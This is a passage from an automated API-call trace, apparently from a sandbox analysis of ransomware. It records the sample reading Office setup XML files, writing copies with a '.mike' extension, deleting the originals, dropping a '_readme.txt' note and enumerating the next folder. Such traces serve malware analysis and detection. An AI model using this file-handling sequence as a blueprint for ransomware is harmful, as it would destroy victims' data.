Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6b [0052.565] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6b [0052.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.565] GetFileType (hFile=0x288) returned 0x1 [0052.565] GetFileType (hFile=0x288) returned 0x1 [0052.565] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.566] WriteFile (in: hFile=0x288, lpBuffer=0x21c9de8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21c9de8*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0052.566] CloseHandle (hObject=0x288) returned 1 [0052.567] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c983c | out: lpFileInformation=0x21c983c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0052.567] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.567] GetFileType (hFile=0x288) returned 0x1 [0052.567] GetFileType (hFile=0x288) returned 0x1 [0052.567] ReadFile (in: hFile=0x288, lpBuffer=0x21caf4c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21caf4c*, lpNumberOfBytesRead=0x2af038*=0xa40, lpOverlapped=0x0) returned 1 [0052.568] CloseHandle (hObject=0x288) returned 1 [0052.569] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6b [0052.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.569] GetFileType (hFile=0x288) returned 0x1 [0052.569] GetFileType (hFile=0x288) returned 0x1 [0052.569] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.569] WriteFile (in: hFile=0x288, lpBuffer=0x21d072c*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21d072c*, lpNumberOfBytesWritten=0x2af02c*=0xa40, lpOverlapped=0x0) returned 1 [0052.569] CloseHandle (hObject=0x288) returned 1 [0052.570] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6b [0052.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.570] GetFileType (hFile=0x288) returned 0x1 [0052.570] GetFileType (hFile=0x288) returned 0x1 [0052.571] WriteFile (in: hFile=0x288, lpBuffer=0x21d3990*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21d3990*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.571] CloseHandle (hObject=0x288) returned 1 [0052.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6b [0052.572] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89fd1a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89fd1a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60)) returned 1 [0052.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6b [0052.572] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21d5328 | out: lpFileInformation=0x21d5328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89fd1a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89fd1a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60)) returned 1 [0052.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.573] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 1 [0052.574] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.574] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.574] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x66 [0052.574] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt", lpFilePart=0x0) returned 0x68 [0052.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.575] GetFileType (hFile=0x288) returned 0x1 [0052.575] GetFileType (hFile=0x288) returned 0x1 [0052.576] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", lpFilePart=0x0) returned 0x5c [0052.576] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\", lpFilePart=0x0) returned 0x5d [0052.576] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe89fd1a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe89fd1a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89b0ee0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89b0ee0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89d7040, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.XML.mike", cAlternateFileName="ACCESS~1.MIK")) returned 1 [0052.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89d7040, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89d7040, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.XML.mike", cAlternateFileName="ACCESS~2.MIK")) returned 1 [0052.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89fd1a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89fd1a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89fd1a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89d7040, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89d7040, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a23300, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89d7040, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89d7040, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a23300, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.577] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", lpFilePart=0x0) returned 0x5b [0052.577] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.577] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.577] CoTaskMemFree (pv=0x502980) [0052.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", lpFilePart=0x0) returned 0x5b [0052.578] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", lpFilePart=0x0) returned 0x5b [0052.578] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\", lpFilePart=0x0) returned 0x5c [0052.578] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.XML", cAlternateFileName="")) returned 1 [0052.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.579] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.580] GetFileType (hFile=0x288) returned 0x1 [0052.580] GetFileType (hFile=0x288) returned 0x1 [0052.580] CloseHandle (hObject=0x288) returned 1 [0052.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.580] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0052.580] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, 